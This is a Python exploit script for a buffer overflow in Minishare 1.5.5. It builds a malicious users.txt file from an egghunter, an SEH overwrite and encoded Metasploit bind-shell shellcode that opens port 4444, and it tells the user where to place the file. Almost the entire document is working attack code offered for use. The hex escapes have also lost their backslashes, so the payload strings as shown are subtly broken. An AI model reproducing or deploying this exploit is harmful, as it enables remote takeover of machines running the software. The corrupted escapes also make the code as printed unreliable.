# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# Just rewrote the exploit using egghunter to inject a bind shell payload 
# Bug found by Chris Gabriel credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe

egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x77x30x30x74" # EGG w00t
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com 
shellcode =("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x48x49x49x49x49x51x5ax6ax43"
"x58x30x41x30x50x42x6bx42x41x53x42x32x42x41x32x41"
"x42x41x30x41x41x58x50x38x42x42x75x7ax49x4bx4cx50"
"x6ax78x6bx72x6dx6bx58x6bx49x79x6fx6bx4fx49x6fx53"
"x50x4cx4bx30x6cx56x44x46x44x6ex6bx32x65x35x6cx4c"
"x4bx41x6cx67x75x44x38x65x51x6ax4fx6cx4bx50x4fx64"
"x58x6cx4bx71x4fx75x70x74x41x5ax4bx33x79x6cx4bx70"
"x34x4ex6bx57x71x4ax4ex56x51x6fx30x4fx69x4cx6cx6c"
"x44x69x50x71x64x44x47x4bx71x7ax6ax54x4dx63x31x58"
"x42x5ax4bx4bx44x37x4bx30x54x65x74x37x58x70x75x38"
"x65x4ex6bx53x6fx61x34x56x61x58x6bx30x66x6ex6bx76"
"x6cx50x4bx6cx4bx31x4fx75x4cx73x31x4ax4bx53x33x46"
"x4cx4ex6bx6cx49x32x4cx77x54x55x4cx45x31x4bx73x45"
"x61x4bx6bx55x34x4ex6bx37x33x30x30x4ex6bx51x50x64"
"x4cx6cx4bx52x50x45x4cx6ex4dx4ex6bx31x50x37x78x73"
"x6ex50x68x6cx4ex52x6ex74x4ex48x6cx52x70x49x6fx48"
"x56x41x76x30x53x30x66x35x38x74x73x76x52x30x68x70"
"x77x70x73x37x42x71x4fx73x64x49x6fx58x50x53x58x58"
"x4bx7ax4dx4bx4cx75x6bx42x70x79x6fx4ex36x73x6fx4e"
"x69x4dx35x55x36x4ex61x6ax4dx66x68x47x72x30x55x50"
"x6ax64x42x39x6fx48x50x33x58x6ex39x35x59x6ax55x4c"
"x6dx73x67x4bx4fx4bx66x76x33x62x73x66x33x70x53x53"
"x63x57x33x56x33x61x53x53x63x6bx4fx4ax70x51x76x63"
"x58x46x71x71x4cx72x46x63x63x6cx49x6bx51x4fx65x61"
"x78x4dx74x44x5ax32x50x59x57x51x47x6bx4fx58x56x72"
"x4ax32x30x50x51x42x75x6bx4fx68x50x42x48x4fx54x4e"
"x4dx44x6ex6dx39x33x67x4bx4fx68x56x76x33x73x65x79"
"x6fx6ex30x73x58x6bx55x33x79x4ex66x37x39x30x57x59"
"x6fx58x56x70x50x53x64x50x54x63x65x4bx4fx4ex30x4f"
"x63x72x48x78x67x62x59x7ax66x44x39x42x77x79x6fx48"
"x56x66x35x4bx4fx6ax70x30x66x50x6ax50x64x70x66x50"
"x68x71x73x62x4dx6dx59x78x65x32x4ax52x70x56x39x54"
"x69x58x4cx6fx79x68x67x51x7ax67x34x6fx79x6dx32x36"
"x51x6fx30x78x73x4cx6ax4bx4ex72x62x76x4dx4bx4ex63"
"x72x44x6cx6cx53x6cx4dx73x4ax75x68x6ex4bx6ex4bx6e"
"x4bx75x38x33x42x6bx4ex48x33x45x46x59x6fx32x55x47"
"x34x4bx4fx49x46x63x6bx41x47x61x42x70x51x71x41x72"
"x71x52x4ax36x61x70x51x30x51x33x65x70x51x6bx4fx4e"
"x30x51x78x6cx6dx5ax79x57x75x78x4ex53x63x49x6fx6a"
"x76x63x5ax49x6fx6bx4fx56x57x6bx4fx5ax70x6ex6bx42"
"x77x6bx4cx4bx33x6bx74x73x54x4bx4fx6ex36x36x32x6b"
"x4fx68x50x35x38x31x6ex4bx68x5ax42x44x33x72x73x6b"
"x4fx4ex36x4bx4fx7ax70x43")

nops     = "x90" * (386 - len(egghunter))
morenops = "x90" * 32             # need enough NOPs to overwrite the first instance of the egg
seh      = "xE7x13x40x00"      # POP POP RET
nseh     = "xebxc0x90x90"      # short jump 64 bytes
egg      = "w00tw00t"              # the key the egghunter looks for

buff     = nops  + egghunter  +  nseh + seh  + morenops + egg + shellcode

#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]

try:
 	f = open("users.txt",'w')
	f.write(buff)
	f.close()

	print "n"	
	print "t---------------------------------------------------------------------------------"
	print "t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
	print "t---------------------------------------------------------------------------------"
	print "n"
 
	print "t- File 'users.txt' created..."
	print "t- Place the 'users.txt' file in the Minishare directory and run the program...n" 
except:
	print "t-Oooops! Can't write file 'users.txt'...n"